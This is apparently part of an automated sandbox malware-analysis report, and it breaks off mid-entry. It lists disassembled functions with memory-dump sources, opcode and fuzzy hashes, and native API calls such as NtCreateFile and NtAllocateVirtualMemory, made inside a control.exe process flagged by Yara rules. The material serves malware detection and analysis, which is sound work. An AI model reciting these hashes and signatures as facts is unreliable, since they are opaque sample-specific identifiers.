                                                                        • Opcode ID: bd815d0bb2eb8b824d693577efff2385400b1cd7e4f08f533fe19170d10acf1b
                                                                        • Instruction ID: 70d15979dbad7a2d5f7a6168cb10664b846090b3ebae6ce1bfca9529e6b41ffd
                                                                        • Opcode Fuzzy Hash: bd815d0bb2eb8b824d693577efff2385400b1cd7e4f08f533fe19170d10acf1b
                                                                        • Instruction Fuzzy Hash: D890027224145002D1407199C44460B5055B7E1351F61C811E4416A58CC6558856A261
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 01519A10, Relevance: .0, Instructions: 4COMMON
                                                                        Download Yara Rule
                                                                        Memory Dump Source
                                                                        • Source File: 00000002.00000002.729115737.00000000014B0000.00000040.00000001.sdmp, Offset: 014B0000, based on PE: true
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 0f3f7ee1d425bbfc63f9022366f08a18aecdf2c33a799073d095a1416cbcb518
                                                                        • Instruction ID: c1baa4b1ad9240c19d3dd931183be0ecb7e2bcfd8259c1ab101d79a42f8acf38
                                                                        • Opcode Fuzzy Hash: 0f3f7ee1d425bbfc63f9022366f08a18aecdf2c33a799073d095a1416cbcb518
                                                                        • Instruction Fuzzy Hash: 8990027224141402D100619988087470055B7D1352F61C411E9155A59EC6A5C8917571
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 01519A80, Relevance: .0, Instructions: 4COMMON
                                                                        Download Yara Rule
                                                                        Memory Dump Source
                                                                        • Source File: 00000002.00000002.729115737.00000000014B0000.00000040.00000001.sdmp, Offset: 014B0000, based on PE: true
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 7b9b5b6a53199d1734e1053251ecec8d7cc5c38014ad9d245d8fd006892fabd6
                                                                        • Instruction ID: 211aa87ef90991c04eab730b32d920c05b06b39937e6786d414ab7b5472d40d6
                                                                        • Opcode Fuzzy Hash: 7b9b5b6a53199d1734e1053251ecec8d7cc5c38014ad9d245d8fd006892fabd6
                                                                        • Instruction Fuzzy Hash: 7290026224145442D14062998804B0F4155B7E2252FA1C419E8147A58CC95588556761
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 01519560, Relevance: .0, Instructions: 4COMMON
                                                                        Download Yara Rule
                                                                        Memory Dump Source
                                                                        • Source File: 00000002.00000002.729115737.00000000014B0000.00000040.00000001.sdmp, Offset: 014B0000, based on PE: true
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 9c375983a90c29aacf1a68d74a1b941ec02eafdef8a475ae5f4397cba7a5d732
                                                                        • Instruction ID: 364652b1d434ea89fa9eed2725a7e6fc25ab39832618553efe16a9f2dfbeff9b
                                                                        • Opcode Fuzzy Hash: 9c375983a90c29aacf1a68d74a1b941ec02eafdef8a475ae5f4397cba7a5d732
                                                                        • Instruction Fuzzy Hash: 74900266261010020145A599460450B0495B7D73A13A1C415F5407A94CC66188656361
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 0151AD30, Relevance: .0, Instructions: 4COMMON
                                                                        Download Yara Rule
                                                                        Memory Dump Source
                                                                        • Source File: 00000002.00000002.729115737.00000000014B0000.00000040.00000001.sdmp, Offset: 014B0000, based on PE: true
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 7cac6109718580971e339cf7d3b9c0c5fb7cd3cdff38c6b016277565bcf0d9f8
                                                                        • Instruction ID: b81fadafa9cf46fbc8f781d0d1ba87be08753dfb264941eee101d695333cf3b5
                                                                        • Opcode Fuzzy Hash: 7cac6109718580971e339cf7d3b9c0c5fb7cd3cdff38c6b016277565bcf0d9f8
                                                                        • Instruction Fuzzy Hash: D9900272A45010129140719988146464056B7E1791B65C411E4505A58CC9948A5563E1
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 01519520, Relevance: .0, Instructions: 4COMMON
                                                                        Download Yara Rule
                                                                        Memory Dump Source
                                                                        • Source File: 00000002.00000002.729115737.00000000014B0000.00000040.00000001.sdmp, Offset: 014B0000, based on PE: true
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 4ee9ed21bf2a9f4d5e712dc664be359ad1ed637312f315df943c762ee4e633d5
                                                                        • Instruction ID: 1a3c64c78b4dbe706e6c9872d45b74eb431fcc9c20229207998275c5cbd02ec9
                                                                        • Opcode Fuzzy Hash: 4ee9ed21bf2a9f4d5e712dc664be359ad1ed637312f315df943c762ee4e633d5
                                                                        • Instruction Fuzzy Hash: B39002E2241150924500A299C404B0A4555B7E1251B61C416E5045A64CC5658851A175
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 015195F0, Relevance: .0, Instructions: 4COMMON
                                                                        Download Yara Rule
                                                                        Memory Dump Source
                                                                        • Source File: 00000002.00000002.729115737.00000000014B0000.00000040.00000001.sdmp, Offset: 014B0000, based on PE: true
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: cdcc1188b17c760ebb7d380245d2f6e1b29efc1e5a26af6b98ad72d60f1d33bf
                                                                        • Instruction ID: dbda118e9fe53b06d7bdff8244658abd4768124bc87cd67792600663e0440012
                                                                        • Opcode Fuzzy Hash: cdcc1188b17c760ebb7d380245d2f6e1b29efc1e5a26af6b98ad72d60f1d33bf
                                                                        • Instruction Fuzzy Hash: 8890027224101802D104619988046860055B7D1351F61C411EA015B59ED6A588917171
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 0151A770, Relevance: .0, Instructions: 4COMMON
                                                                        Download Yara Rule
                                                                        Memory Dump Source
                                                                        • Source File: 00000002.00000002.729115737.00000000014B0000.00000040.00000001.sdmp, Offset: 014B0000, based on PE: true
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 3ee3fef611e9d9ce11f7905101b85c1633b82a8ee593626395dd339290d8831a
                                                                        • Instruction ID: ba8d3ee529f644e086032ba319ab2048148638e72de864a92716a054d96ed204
                                                                        • Opcode Fuzzy Hash: 3ee3fef611e9d9ce11f7905101b85c1633b82a8ee593626395dd339290d8831a
                                                                        • Instruction Fuzzy Hash: C690027624505442D50065999804A870055B7D1355F61D811E4415A9CDC6948861B161
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 01519770, Relevance: .0, Instructions: 4COMMON
                                                                        Download Yara Rule
                                                                        Memory Dump Source
                                                                        • Source File: 00000002.00000002.729115737.00000000014B0000.00000040.00000001.sdmp, Offset: 014B0000, based on PE: true
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 3ef5d83eff81e28438127289e59816960f23dde6398d69a21ff87364ad44dfce
                                                                        • Instruction ID: 052c9b2a56948069cb09ab5bb7b0fc6028990ccbf90d6a5fd9649eed2ddffd4a
                                                                        • Opcode Fuzzy Hash: 3ef5d83eff81e28438127289e59816960f23dde6398d69a21ff87364ad44dfce
                                                                        • Instruction Fuzzy Hash: 5690026224505442D10065999408A060055B7D1255F61D411E5055A99DC6758851B171
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 01519760, Relevance: .0, Instructions: 4COMMON
                                                                        Download Yara Rule
                                                                        Memory Dump Source
                                                                        • Source File: 00000002.00000002.729115737.00000000014B0000.00000040.00000001.sdmp, Offset: 014B0000, based on PE: true
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 2d7b656aa5facc10583b74e53c06273c5e07f143ad92738732405b9e5cf3a940
                                                                        • Instruction ID: 5dbc6a2108bf910dbacab72e7e0569ec762a0b726d393233c47ef3465f52c847
                                                                        • Opcode Fuzzy Hash: 2d7b656aa5facc10583b74e53c06273c5e07f143ad92738732405b9e5cf3a940
                                                                        • Instruction Fuzzy Hash: 0790027224101403D100619995087070055B7D1251F61D811E4415A5CDD69688517161
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 0151A710, Relevance: .0, Instructions: 4COMMON
                                                                        Download Yara Rule
                                                                        Memory Dump Source
                                                                        • Source File: 00000002.00000002.729115737.00000000014B0000.00000040.00000001.sdmp, Offset: 014B0000, based on PE: true
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 7d3e809b303c539fe228466bb56fe5dfce3c42b2ad72c6aa01e2e3832939542b
                                                                        • Instruction ID: 375d375decc97a40d032ea3fca8bcab8959b82e8763dd6c09bf734abc7294fc3
                                                                        • Opcode Fuzzy Hash: 7d3e809b303c539fe228466bb56fe5dfce3c42b2ad72c6aa01e2e3832939542b
                                                                        • Instruction Fuzzy Hash: A4900272341010529500A6D99804A4A4155B7F1351B61D415E8005A58CC59488616161
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 01519730, Relevance: .0, Instructions: 4COMMON
                                                                        Download Yara Rule
                                                                        Memory Dump Source
                                                                        • Source File: 00000002.00000002.729115737.00000000014B0000.00000040.00000001.sdmp, Offset: 014B0000, based on PE: true
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: c9ce3546571002652a32dfd0a5a4851880843b26efa63a3c86bef7dbb13ce290
                                                                        • Instruction ID: 6264cd7303395b14ddb3ba6704815ae7a7d5c9fdd7a5adcfe4d4c29181e807e3
                                                                        • Opcode Fuzzy Hash: c9ce3546571002652a32dfd0a5a4851880843b26efa63a3c86bef7dbb13ce290
                                                                        • Instruction Fuzzy Hash: 3090026264501402D140719994187060065B7D1251F61D411E4015A58DC6998A5576E1
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 01519650, Relevance: .0, Instructions: 4COMMON
                                                                        Download Yara Rule
                                                                        Memory Dump Source
                                                                        • Source File: 00000002.00000002.729115737.00000000014B0000.00000040.00000001.sdmp, Offset: 014B0000, based on PE: true
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: e3f2c29c211b1b82bc256937dd9bee86210f0953ffad89ab4ee469c77449b343
                                                                        • Instruction ID: d36e394631e5a3a1f3f35a77f76822c30094ce01249893445daa5ea73818d606
                                                                        • Opcode Fuzzy Hash: e3f2c29c211b1b82bc256937dd9bee86210f0953ffad89ab4ee469c77449b343
                                                                        • Instruction Fuzzy Hash: A590027224505842D14071998404A460065B7D1355F61C411E4055B98DD6658D55B6A1
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 01519610, Relevance: .0, Instructions: 4COMMON
                                                                        Download Yara Rule
                                                                        Memory Dump Source
                                                                        • Source File: 00000002.00000002.729115737.00000000014B0000.00000040.00000001.sdmp, Offset: 014B0000, based on PE: true
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: f140611eb917530042ace110bf666750e22c8ede54fa758806037cdc4f64fa82
                                                                        • Instruction ID: f96c3864f2ff32237ff9c56d44891eeb018a9923475a8e7e61edccabe284b694
                                                                        • Opcode Fuzzy Hash: f140611eb917530042ace110bf666750e22c8ede54fa758806037cdc4f64fa82
                                                                        • Instruction Fuzzy Hash: DA90027264501802D150719984147460055B7D1351F61C411E4015B58DC7958A5576E1
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 015196D0, Relevance: .0, Instructions: 4COMMON
                                                                        Download Yara Rule
                                                                        Memory Dump Source
                                                                        • Source File: 00000002.00000002.729115737.00000000014B0000.00000040.00000001.sdmp, Offset: 014B0000, based on PE: true
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 9875a42acf28304a391c93454f7a71a1aac601a20b129020e91ec2917f615bd3
                                                                        • Instruction ID: f4769a5a2d3251f1eac64d4da75f141b1e140418a092f6a21749a7119c40f95c
                                                                        • Opcode Fuzzy Hash: 9875a42acf28304a391c93454f7a71a1aac601a20b129020e91ec2917f615bd3
                                                                        • Instruction Fuzzy Hash: 4A90027224101842D10061998404B460055B7E1351F61C416E4115B58DC655C8517561
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 01519670, Relevance: .0, Instructions: 2COMMON
                                                                        Download Yara Rule
                                                                        Memory Dump Source
                                                                        • Source File: 00000002.00000002.729115737.00000000014B0000.00000040.00000001.sdmp, Offset: 014B0000, based on PE: true
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: a3d3d3c0123cddb368cc51eab9da9c3aaeeac76cd7bbfae310620ba6f7f49b43
                                                                        • Instruction ID: 69475cadf27ff3b54c9a0c09a3939687cb910d3e6f22070f8fa2e0bdd5b40ab5
                                                                        • Opcode Fuzzy Hash: a3d3d3c0123cddb368cc51eab9da9c3aaeeac76cd7bbfae310620ba6f7f49b43
                                                                        • Instruction Fuzzy Hash:
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 0156FDDA, Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 42COMMON
                                                                        Download Yara Rule
                                                                        C-Code - Quality: 53%
                                                                        			E0156FDDA(intOrPtr* __edx, intOrPtr _a4) {
				void* _t7;
				intOrPtr _t9;
				intOrPtr _t10;
				intOrPtr* _t12;
				intOrPtr* _t13;
				intOrPtr _t14;
				intOrPtr* _t15;

				_t13 = __edx;
				_push(_a4);
				_t14 =  *[fs:0x18];
				_t15 = _t12;
				_t7 = E0151CE00( *__edx,  *((intOrPtr*)(__edx + 4)), 0xff676980, 0xffffffff);
				_push(_t13);
				E01565720(0x65, 1, "RTL: Enter CriticalSection Timeout (%I64u secs) %d\n", _t7);
				_t9 =  *_t15;
				if(_t9 == 0xffffffff) {
					_t10 = 0;
				} else {
					_t10 =  *((intOrPtr*)(_t9 + 0x14));
				}
				_push(_t10);
				_push(_t15);
				_push( *((intOrPtr*)(_t15 + 0xc)));
				_push( *((intOrPtr*)(_t14 + 0x24)));
				return E01565720(0x65, 0, "RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u\n",  *((intOrPtr*)(_t14 + 0x20)));
			}










                                                                        0x0156fdda
                                                                        0x0156fde2
                                                                        0x0156fde5
                                                                        0x0156fdec
                                                                        0x0156fdfa
                                                                        0x0156fdff
                                                                        0x0156fe0a
                                                                        0x0156fe0f
                                                                        0x0156fe17
                                                                        0x0156fe1e
                                                                        0x0156fe19
                                                                        0x0156fe19
                                                                        0x0156fe19
                                                                        0x0156fe20
                                                                        0x0156fe21
                                                                        0x0156fe22
                                                                        0x0156fe25
                                                                        0x0156fe40

                                                                        APIs
                                                                        • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 0156FDFA
                                                                        Strings
                                                                        • RTL: Enter CriticalSection Timeout (%I64u secs) %d, xrefs: 0156FE01
                                                                        • RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u, xrefs: 0156FE2B
                                                                        Memory Dump Source
                                                                        • Source File: 00000002.00000002.729115737.00000000014B0000.00000040.00000001.sdmp, Offset: 014B0000, based on PE: true
                                                                        Similarity
                                                                        • API ID: Unothrow_t@std@@@__ehfuncinfo$??2@
                                                                        • String ID: RTL: Enter CriticalSection Timeout (%I64u secs) %d$RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u
                                                                        • API String ID: 885266447-3903918235
                                                                        • Opcode ID: f70fc36faff4db5ab8ca2340100ec664c037d29f894bf6982a54a8fc35931828
                                                                        • Instruction ID: bd1056a5e4b854268963cd4130b476993785db9130df086ebb106986c67264fe
                                                                        • Opcode Fuzzy Hash: f70fc36faff4db5ab8ca2340100ec664c037d29f894bf6982a54a8fc35931828
                                                                        • Instruction Fuzzy Hash: B8F0C8366406027FE6211A45DC01E237F5EEB84B70F240319F6245A5E1E9A2B82086E0
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Analysis Process: control.exe PID: 6848 Parent PID: 6192 control.exeCOMMON

                                                                        Executed Functions

                                                                        Function 009481B0, Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 40filenativeCOMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        • NtCreateFile.NTDLL(00000060,00000000,.z`,00943B87,00000000,FFFFFFFF,?,?,FFFFFFFF,00000000,00943B87,007A002E,00000000,00000060,00000000,00000000), ref: 009481FD
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000007.00000002.916260841.0000000000930000.00000040.00000001.sdmp, Offset: 00930000, based on PE: false
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID: CreateFile
                                                                        • String ID: .z`
                                                                        • API String ID: 823142352-1441809116
                                                                        • Opcode ID: 19fa48ade07888cfcca4191431b874d7c75bcaabbd4d52727e7364b5df5f6853
                                                                        • Instruction ID: aa7e2539e38242b0ea86768629304d15aacd82537efd590a2fd2a156d02cb572
                                                                        • Opcode Fuzzy Hash: 19fa48ade07888cfcca4191431b874d7c75bcaabbd4d52727e7364b5df5f6853
                                                                        • Instruction Fuzzy Hash: D7F0B6B2201108ABCB08DF88DC85EEB77ADAF8C754F158248FA0D97241C630E8118BA4
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 009482AC, Relevance: 1.6, APIs: 1, Instructions: 57filenativeCOMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        • NtReadFile.NTDLL(00943D42,5E972F59,FFFFFFFF,00943A01,?,?,00943D42,?,00943A01,FFFFFFFF,5E972F59,00943D42,?,00000000), ref: 009482A5
                                                                        Memory Dump Source
                                                                        • Source File: 00000007.00000002.916260841.0000000000930000.00000040.00000001.sdmp, Offset: 00930000, based on PE: false
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID: FileRead
                                                                        • String ID:
                                                                        • API String ID: 2738559852-0
                                                                        • Opcode ID: c7edd4fd4d06aa36a8b3e72857365d84c1e528433a379cc5388247f8ffbec704
                                                                        • Instruction ID: 5bfe15ba84d65610a33a69f4c18f71913ae2f00e26080cbacc5965d9edd254e6
                                                                        • Opcode Fuzzy Hash: c7edd4fd4d06aa36a8b3e72857365d84c1e528433a379cc5388247f8ffbec704
                                                                        • Instruction Fuzzy Hash: CF110C72200104AFCB14DF98CC85EEB77ADEF8C754F158558FA1D97241CA30E911CBA0
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 00948260, Relevance: 1.5, APIs: 1, Instructions: 36filenativeCOMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        • NtReadFile.NTDLL(00943D42,5E972F59,FFFFFFFF,00943A01,?,?,00943D42,?,00943A01,FFFFFFFF,5E972F59,00943D42,?,00000000), ref: 009482A5
                                                                        Memory Dump Source
                                                                        • Source File: 00000007.00000002.916260841.0000000000930000.00000040.00000001.sdmp, Offset: 00930000, based on PE: false
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID: FileRead
                                                                        • String ID:
                                                                        • API String ID: 2738559852-0
                                                                        • Opcode ID: 1cb0ad745fa17a6b0f92d1251f92e59420b1dcb8c70dd00eb84f7822971f7938
                                                                        • Instruction ID: 34c3c8528d2d8e2556d1e40bc6370c3bf87f560f0a76a8df591ae48e5585cf97
                                                                        • Opcode Fuzzy Hash: 1cb0ad745fa17a6b0f92d1251f92e59420b1dcb8c70dd00eb84f7822971f7938
                                                                        • Instruction Fuzzy Hash: 00F0A4B2200208ABCB14DF89DC81EEB77ADAF8C754F158248BA1D97241DA30E8118BA0
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 0094838B, Relevance: 1.5, APIs: 1, Instructions: 32memorynativeCOMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        • NtAllocateVirtualMemory.NTDLL(00000004,00003000,00002000,00000000,?,00932D11,00002000,00003000,00000004), ref: 009483C9
                                                                        Memory Dump Source
                                                                        • Source File: 00000007.00000002.916260841.0000000000930000.00000040.00000001.sdmp, Offset: 00930000, based on PE: false
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID: AllocateMemoryVirtual
                                                                        • String ID:
                                                                        • API String ID: 2167126740-0
                                                                        • Opcode ID: 7ca60511e67bd80e9fdd794548457939173102ca0c3c1b7c239d611a4510c0bf
                                                                        • Instruction ID: dc8817064799b9daec38ef62bd59c46ff40e98076c44abbb52966b3cd13e0e32
                                                                        • Opcode Fuzzy Hash: 7ca60511e67bd80e9fdd794548457939173102ca0c3c1b7c239d611a4510c0bf
                                                                        • Instruction Fuzzy Hash: 7DF0F8B5200208ABCB14DF99DC95EAB77ADBF88350F158159FE1897241C630E910CBA0
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 00948390, Relevance: 1.5, APIs: 1, Instructions: 30memorynativeCOMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        • NtAllocateVirtualMemory.NTDLL(00000004,00003000,00002000,00000000,?,00932D11,00002000,00003000,00000004), ref: 009483C9
                                                                        Memory Dump Source
                                                                        • Source File: 00000007.00000002.916260841.0000000000930000.00000040.00000001.sdmp, Offset: 00930000, based on PE: false
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID: AllocateMemoryVirtual
                                                                        • String ID:
                                                                        • API String ID: 2167126740-0
                                                                        • Opcode ID: e868ca870ba9ad3aee1a8e1804f154c56992d5df3b6804a08460a29a32ddb2bb
                                                                        • Instruction ID: ed768e751b69b80bb0d2b9d11f2199c78604c323297a836d4f50e57c1548ae1b
                                                                        • Opcode Fuzzy Hash: e868ca870ba9ad3aee1a8e1804f154c56992d5df3b6804a08460a29a32ddb2bb
                                                                        • Instruction Fuzzy Hash: 77F015B2200208ABCB14DF89CC81EEB77ADAF88750F118148FE0897281CA30F810CBE0
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 009482E0, Relevance: 1.5, APIs: 1, Instructions: 20nativeCOMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        • NtClose.NTDLL(00943D20,?,?,00943D20,00000000,FFFFFFFF), ref: 00948305
                                                                        Memory Dump Source
                                                                        • Source File: 00000007.00000002.916260841.0000000000930000.00000040.00000001.sdmp, Offset: 00930000, based on PE: false
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID: Close
                                                                        • String ID:
                                                                        • API String ID: 3535843008-0
                                                                        • Opcode ID: aa41620b67aec822f8463caeb84bd84f714cc802f2fd34de09a1d76353dd2617
                                                                        • Instruction ID: 342b837701356767723bbb0722e9a392e9a48463a1f25bd66b3e4328f203194d
                                                                        • Opcode Fuzzy Hash: aa41620b67aec822f8463caeb84bd84f714cc802f2fd34de09a1d76353dd2617
                                                                        • Instruction Fuzzy Hash: 96D012756002146BD710EF98CC45FD7775CEF44750F154455BA185B282C930F90086E0
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 04BC9860, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        Memory Dump Source
                                                                        • Source File: 00000007.00000002.917101037.0000000004B60000.00000040.00000001.sdmp, Offset: 04B60000, based on PE: true
                                                                        • Associated: 00000007.00000002.917212962.0000000004C7B000.00000040.00000001.sdmp Download File
                                                                        • Associated: 00000007.00000002.917228715.0000000004C7F000.00000040.00000001.sdmp Download File
                                                                        Similarity
                                                                        • API ID: InitializeThunk
                                                                        • String ID:
                                                                        • API String ID: 2994545307-0
                                                                        • Opcode ID: 93313b24967bab71e78f30cf6be6478439608d54d25507ffccdef9ddf9bcfb7b
                                                                        • Instruction ID: 9f999b5ca5f808807c1b8194297452f856435f2b4632f4e0179c59a2b307fd97
                                                                        • Opcode Fuzzy Hash: 93313b24967bab71e78f30cf6be6478439608d54d25507ffccdef9ddf9bcfb7b
                                                                        • Instruction Fuzzy Hash: 5190027224100413F11161594504707000DD7D0285F95C496A0815558DA696D962B161
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 04BC9840, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        Memory Dump Source
                                                                        • Source File: 00000007.00000002.917101037.0000000004B60000.00000040.00000001.sdmp, Offset: 04B60000, based on PE: true
                                                                        • Associated: 00000007.00000002.917212962.0000000004C7B000.00000040.00000001.sdmp Download File
                                                                        • Associated: 00000007.00000002.917228715.0000000004C7F000.00000040.00000001.sdmp Download File
                                                                        Similarity
                                                                        • API ID: InitializeThunk
                                                                        • String ID:
                                                                        • API String ID: 2994545307-0
                                                                        • Opcode ID: 75659476e317944544a965dbc7845ef25c9c0c6af9b0c9adbfd1410a72354ede
                                                                        • Instruction ID: fd16f48a45c29eaa7323626385093723df5cee4758e0913bcc10875f048f42bb
                                                                        • Opcode Fuzzy Hash: 75659476e317944544a965dbc7845ef25c9c0c6af9b0c9adbfd1410a72354ede
                                                                        • Instruction Fuzzy Hash: 8F900262282041527545B1594404507400AE7E0285B95C096A1805950C9566E866E661
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 04BC99A0, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        Memory Dump Source
                                                                        • Source File: 00000007.00000002.917101037.0000000004B60000.00000040.00000001.sdmp, Offset: 04B60000, based on PE: true
                                                                        • Associated: 00000007.00000002.917212962.0000000004C7B000.00000040.00000001.sdmp Download File
                                                                        • Associated: 00000007.00000002.917228715.0000000004C7F000.00000040.00000001.sdmp Download File
                                                                        Similarity
                                                                        • API ID: InitializeThunk
                                                                        • String ID:
                                                                        • API String ID: 2994545307-0
                                                                        • Opcode ID: 1c4d982808d4d1a86debf0fc039793630af484f185bee296672990bfab56fec5
                                                                        • Instruction ID: 4cd9b8a705b5025385a602c01a27f61052527825ab2a679f783d7a43f324101c
                                                                        • Opcode Fuzzy Hash: 1c4d982808d4d1a86debf0fc039793630af484f185bee296672990bfab56fec5
                                                                        • Instruction Fuzzy Hash: 479002A238100442F10061594414B060009D7E1345F55C099E1455554D9659DC627166
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 04BC95D0, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        Memory Dump Source
                                                                        • Source File: 00000007.00000002.917101037.0000000004B60000.00000040.00000001.sdmp, Offset: 04B60000, based on PE: true
                                                                        • Associated: 00000007.00000002.917212962.0000000004C7B000.00000040.00000001.sdmp Download File
                                                                        • Associated: 00000007.00000002.917228715.0000000004C7F000.00000040.00000001.sdmp Download File
                                                                        Similarity
                                                                        • API ID: InitializeThunk
                                                                        • String ID:
                                                                        • API String ID: 2994545307-0
                                                                        • Opcode ID: a22440e8d0175620c7eab07616c76271b6738150f99ac4eb3db78054f9918a6d
                                                                        • Instruction ID: f83fd5c2e10bd357fa0735a9e34b312efa24a53eb75040e137af0bf12a870a58
                                                                        • Opcode Fuzzy Hash: a22440e8d0175620c7eab07616c76271b6738150f99ac4eb3db78054f9918a6d
                                                                        • Instruction Fuzzy Hash: D09002A224200003610571594414616400ED7E0245F55C0A5E1405590DD565D8A17165
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 04BC9910, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        Memory Dump Source
                                                                        • Source File: 00000007.00000002.917101037.0000000004B60000.00000040.00000001.sdmp, Offset: 04B60000, based on PE: true
                                                                        • Associated: 00000007.00000002.917212962.0000000004C7B000.00000040.00000001.sdmp Download File
                                                                        • Associated: 00000007.00000002.917228715.0000000004C7F000.00000040.00000001.sdmp Download File
                                                                        Similarity
                                                                        • API ID: InitializeThunk
                                                                        • String ID:
                                                                        • API String ID: 2994545307-0
                                                                        • Opcode ID: b3aa9c0af96c758655360145dc2d4319ce17fd41fb46303c6e1cf1d9af9eaad3
                                                                        • Instruction ID: 82bd013e8cde6cb74e42e8ae951c1236e9dde98a56e5b693e7da7ca6a87fe988
                                                                        • Opcode Fuzzy Hash: b3aa9c0af96c758655360145dc2d4319ce17fd41fb46303c6e1cf1d9af9eaad3
                                                                        • Instruction Fuzzy Hash: 6D9002B224100402F140715944047460009D7D0345F55C095A5455554E9699DDE576A5
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 04BC9540, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        Memory Dump Source
                                                                        • Source File: 00000007.00000002.917101037.0000000004B60000.00000040.00000001.sdmp, Offset: 04B60000, based on PE: true
                                                                        • Associated: 00000007.00000002.917212962.0000000004C7B000.00000040.00000001.sdmp Download File
                                                                        • Associated: 00000007.00000002.917228715.0000000004C7F000.00000040.00000001.sdmp Download File
                                                                        Similarity
                                                                        • API ID: InitializeThunk
                                                                        • String ID:
                                                                        • API String ID: 2994545307-0
                                                                        • Opcode ID: 85bb1994aed20014ae30a650200d549e29a8c14f105cb65837b2ebf86748247b
                                                                        • Instruction ID: 89a6dd9b85836e5c7609d74f4a16bfa7448cc14352c5ad8b92aca51b241b4c09
                                                                        • Opcode Fuzzy Hash: 85bb1994aed20014ae30a650200d549e29a8c14f105cb65837b2ebf86748247b
